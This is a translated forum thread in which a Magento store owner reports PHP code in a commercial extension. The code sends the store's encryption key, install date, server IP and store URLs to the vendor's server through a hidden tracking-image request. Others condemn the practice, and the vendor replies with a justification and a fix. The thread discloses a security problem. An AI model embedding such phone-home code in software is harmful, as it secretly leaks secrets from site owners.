Bất kỳ lý do chính đáng cho một mô-đun được truy cập toàn cầu / mật mã / khóa từ xa?

Tha thứ cho sự thiếu hiểu biết của tôi, nhưng khóa mật mã được sử dụng để giải mã dữ liệu Magento, phải không? Có bất kỳ lý do tốt cho một mô-đun để truy cập này? Tôi tình cờ tìm thấy mã này sau khi cài đặt Trình quản lý nội dung nâng cao ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

Vâng ... có một lý do tốt.
Họ muốn biết nó và đăng nhập nó, chỉ trong trường hợp. :)

Bạn nên gỡ cài đặt tiện ích mở rộng (rất có thể bạn đã làm). Bạn không bao giờ nên sử dụng các tiện ích mở rộng "điện thoại nhà", bất kể dữ liệu họ gửi về nhà là gì.

Bạn có thể muốn liệt kê tiện ích mở rộng ở đây để người khác xem: Mã hài hước / vô dụng / khủng khiếp từ tiện ích mở rộng Magento

Chúng tôi đã nhận được yêu cầu hỗ trợ về tính năng này ngày hôm nay. Chúng tôi đã giải quyết nó và loại bỏ đoạn mã này. Một bản phát hành mới có sẵn cho tất cả khách hàng của chúng tôi trong khu vực khách hàng của họ (miễn phí, vì chúng tôi cung cấp cập nhật không giới hạn).

Tôi biết chúng ta cần biện minh cho điều này, vì vậy hãy làm điều đó:

• Mục tiêu của trình theo dõi này là CHỈ tuân theo việc sử dụng tiện ích mở rộng của chúng tôi.
• Trình theo dõi chỉ được hiển thị trong khu vực quản trị (không có khách hàng nào của bạn hoặc bất kỳ ai khác ngoài bạn và chúng tôi đã có thể nhìn thấy nó).
• Chúng tôi cũng loại bỏ điều này trong DB của chúng tôi.
• Chìa khóa chỉ để mã hóa mật khẩu quản trị viên của bạn. Vì chúng tôi sử dụng để làm việc với tất cả các bạn theo yêu cầu hỗ trợ, nên bạn có thể đã gửi thông tin đăng nhập của bạn cho chúng tôi bằng email, để được hỗ trợ. Nếu chúng tôi muốn mật khẩu của bạn, chúng tôi sẽ trực tiếp gửi nó ... Đó không phải là mục tiêu.
• Ngay cả với chìa khóa, mật khẩu của bạn vẫn được mã hóa. Và quản trị viên magento chặn người dùng sau một số suy nghĩ.

Chúng tôi nhận ra rằng đó là một sai lầm và đây là điểm mạnh của cộng đồng và hệ thống nguồn mở: chúng tôi có thể sửa chữa và cải thiện nhanh hơn nhiều. Cảm ơn tất cả các bạn đã cảnh báo chúng tôi, chúng tôi sẽ nỗ lực nhiều hơn về lỗ hổng bây giờ.